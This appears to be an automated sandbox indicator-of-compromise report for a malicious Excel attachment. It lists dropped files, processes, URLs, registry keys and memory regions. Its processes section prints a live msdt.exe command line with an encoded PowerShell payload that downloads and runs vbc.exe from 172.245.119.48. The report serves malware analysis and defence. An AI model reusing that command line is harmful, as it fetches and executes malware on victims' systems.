IOC Report
purchase order.xlsx

loading gif

Files

File Path
Type
Category
Malicious
purchase order.xlsx
CDFV2 Encrypted
initial sample
malicious
C:\Users\user\Desktop\~$purchase order.xlsx
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\34C7A8FE-4DF9-41DA-97CE-FBD957286E8B
XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5A2016E7.png
PNG image data, 130 x 187, 8-bit/color RGB, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7092770.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DB1DA0B1.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\document[1].htm
data
downloaded
C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RES13B6.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\RESF139.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
dropped
C:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\~DF2B6201859A4F0F2C.TMP
CDFV2 Encrypted
dropped
C:\Users\user\AppData\Local\Temp\~DF477F7B9558984353.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF82DC9C2209D4F75C.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFA791BA4295C35A78.TMP
data
dropped
C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.diagpkg
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\RS_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\TS_ProgramCompatibilityWizard.ps1
UTF-8 Unicode text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\VF_ProgramCompatibilityWizard.ps1
ISO-8859 text, with CRLF line terminators
dropped
C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\CL_LocalizationData.psd1
Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
dropped
C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\result\results.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43629BF8.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A9EED13.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\527F7CC6.png
PNG image data, 130 x 187, 8-bit/color RGB, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F15EBB99.png
PNG image data, 130 x 187, 8-bit/color RGB, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\~DF077F770245D24E55.TMP
CDFV2 Encrypted
dropped
C:\Users\user\AppData\Local\Temp\~DF14B34C0311447876.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFEA544448D310CFF4.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFFF7070C2B802BAB2.TMP
data
dropped
There are 23 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\SysWOW64\msdt.exe
C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

URLs

Name
IP
Malicious
https://api.diagnosticssdf.office.com
unknown
https://login.microsoftonline.com/
unknown
https://shell.suite.office.com:1443
unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
unknown
https://autodiscover-s.outlook.com/
unknown
https://roaming.edog.
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
unknown
https://cdn.entity.
unknown
https://api.addins.omex.office.net/appinfo/query
unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey
unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
unknown
https://powerlift.acompli.net
unknown
https://rpsticket.partnerservices.getmicrosoftkey.com
unknown
https://lookup.onenote.com/lookup/geolocation/v1
unknown
https://cortana.ai
unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://cloudfiles.onenote.com/upload.aspx
unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://entitlement.diagnosticssdf.office.com
unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
unknown
https://api.aadrm.com/
unknown
https://ofcrecsvcapi-int.azurewebsites.net/
unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
unknown
https://api.microsoftstream.com/api/
unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
unknown
https://cr.office.com
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
unknown
https://portal.office.com/account/?ref=ClientMeControl
unknown
http://172.245.119.48/870/vbc.exe
172.245.119.48
https://graph.ppe.windows.net
unknown
https://res.getmicrosoftkey.com/api/redemptionevents
unknown
https://powerlift-frontdesk.acompli.net
unknown
https://tasks.office.com
unknown
https://officeci.azurewebsites.net/api/
unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work
unknown
https://store.office.cn/addinstemplate
unknown
https://api.aadrm.com
unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=
unknown
https://globaldisco.crm.dynamics.com
unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://dev0-api.acompli.net/autodetect
unknown
https://www.odwebp.svc.ms
unknown
https://api.diagnosticssdf.office.com/v2/feedback
unknown
https://api.powerbi.com/v1.0/myorg/groups
unknown
https://web.microsoftstream.com/video/
unknown
https://api.addins.store.officeppe.com/addinstemplate
unknown
https://graph.windows.net
unknown
https://dataservice.o365filtering.com/
unknown
https://officesetup.getmicrosoftkey.com
unknown
https://analysis.windows.net/powerbi/api
unknown
https://prod-global-autodetect.acompli.net/autodetect
unknown
https://outlook.office365.com/autodiscover/autodiscover.json
unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
unknown
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
unknown
http://172.245.119.48/shipping_invc/document.html
172.245.119.48
https://ncus.contentsync.
unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
unknown
http://weather.service.msn.com/data.aspx
unknown
https://apis.live.net/v5.0/
unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
unknown
https://messaging.lifecycle.office.com/
unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
unknown
https://management.azure.com
unknown
https://outlook.office365.com
unknown
https://wus2.contentsync.
unknown
https://incidents.diagnostics.office.com
unknown
https://clients.config.office.net/user/v1.0/ios
unknown
https://insertmedia.bing.office.net/odc/insertmedia
unknown
https://o365auditrealtimeingestion.manage.office.com
unknown
https://outlook.office365.com/api/v1.0/me/Activities
unknown
https://api.office.net
unknown
https://incidents.diagnosticssdf.office.com
unknown
https://asgsmsproxyapi.azurewebsites.net/
unknown
https://clients.config.office.net/user/v1.0/android/policies
unknown
https://entitlement.diagnostics.office.com
unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
unknown
https://substrate.office.com/search/api/v2/init
unknown
https://outlook.office.com/
unknown
https://storage.live.com/clientlogs/uploadlocation
unknown
https://outlook.office365.com/
unknown
https://webshell.suite.office.com
unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
unknown
https://substrate.office.com/search/api/v1/SearchHistory
unknown
https://management.azure.com/
unknown
https://messaging.lifecycle.office.com/getcustommessage16
unknown
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
unknown
https://login.windows.net/common/oauth2/authorize
unknown
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
unknown
https://graph.windows.net/
unknown
https://api.powerbi.com/beta/myorg/imports
unknown
https://devnull.onenote.com
unknown
https://messaging.action.office.com/
unknown
https://ncus.pagecontentsync.
unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
unknown
https://messaging.office.com/
unknown
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
unknown
There are 90 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
172.245.119.48
unknown
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
ar0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
br0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
RemoteClearDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3
Last
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4954&crev=3\0
Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableIsOwnerRegex
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableSessionAwareHttpClose
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALForExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
DisableADALSetSilentAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableGuestCredProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
msoridDisableOstringReplace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\1D184
1D184
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0
MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0
MSComctlLib
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
=g0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
:#1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\293BB
293BB
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\29A91
29A91
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 21
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\msdt.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
EXCELFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\293BB
293BB
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog
CacheReady
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog
LastRequest
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog
CacheReady
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog
LastUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog
NextUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU\Change
ChangeId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Change
ChangeId
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
s})
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\66B7F
66B7F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
~%)
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\6B8A5
6B8A5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\6BC1E
6BC1E
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\6B8A5
6B8A5
There are 96 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
820000
heap
page read and write
malicious
9A0000
heap
page read and write
malicious
C80000
heap
page read and write
malicious
8940000
trusted library allocation
page read and write
88D7000
direct allocation
page read and write
9BE0000
trusted library allocation
page read and write
108F000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
9AC0000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
139BBE00000
heap
page read and write
A720000
trusted library allocation
page read and write
96F5000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
87D6000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
F5CCCFF000
stack
page read and write
20A30A70000
heap
page read and write
98C0000
trusted library allocation
page read and write
2286AC70000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
8990000
unkown
page read and write
7DA0000
trusted library allocation
page read and write
96B5000
trusted library allocation
page read and write
9938000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
884E000
trusted library allocation
page read and write
774C000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
B495000
trusted library allocation
page read and write
3520000
heap
page read and write
8910000
trusted library allocation
page read and write
1039000
stack
page read and write
7650000
trusted library allocation
page read and write
19EEDB13000
heap
page read and write
9C70000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
52E0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
BB05000
trusted library allocation
page read and write
98B5000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
88F7000
trusted library allocation
page read and write
2BC4C610000
trusted library section
page readonly
5C96000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
2BC4B400000
heap
page read and write
96F0000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
BD82000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
7D95000
trusted library allocation
page read and write
5EBE000
trusted library allocation
page read and write
1E0A9D00000
heap
page read and write
97A0000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
98C5000
trusted library allocation
page read and write
2286A469000
heap
page read and write
9BA0000
trusted library allocation
page read and write
88F0000
direct allocation
page read and write
9890000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
F5CCDFB000
stack
page read and write
5F828FB000
stack
page read and write
79D0000
trusted library allocation
page read and write
2BC50E15000
heap
page read and write
98C0000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
9C40000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
34B9000
heap
page read and write
97B0000
trusted library allocation
page read and write
8990000
trusted library allocation
page execute and read and write
E3C000
stack
page read and write
34C8000
heap
page read and write
20A30A00000
heap
page read and write
98D0000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
1E0A9C51000
heap
page read and write
9890000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
7DA0000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
12E6000
heap
page read and write
44DE7F000
stack
page read and write
96B0000
unkown
page read and write
A700000
trusted library allocation
page read and write
8985000
trusted library allocation
page read and write
2BC50EAE000
heap
page read and write
97B5000
unkown
page read and write
17884A79000
heap
page read and write
9840000
trusted library allocation
page read and write
7800000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
BC0F000
trusted library allocation
page read and write
7D30000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
5B2C000
trusted library allocation
page read and write
65CD000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
A96B000
stack
page read and write
97A0000
trusted library allocation
page read and write
19EEDA48000
heap
page read and write
8858000
trusted library allocation
page read and write
7740000
trusted library allocation
page read and write
3420000
unkown
page read and write
B7E000
stack
page read and write
8890000
direct allocation
page read and write
995000
heap
page read and write
5BF0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
2286A447000
heap
page read and write
8930000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
7D34000
trusted library allocation
page read and write
5B90000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
741377F000
stack
page read and write
98D0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
7D20000
trusted library allocation
page read and write
7D00000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
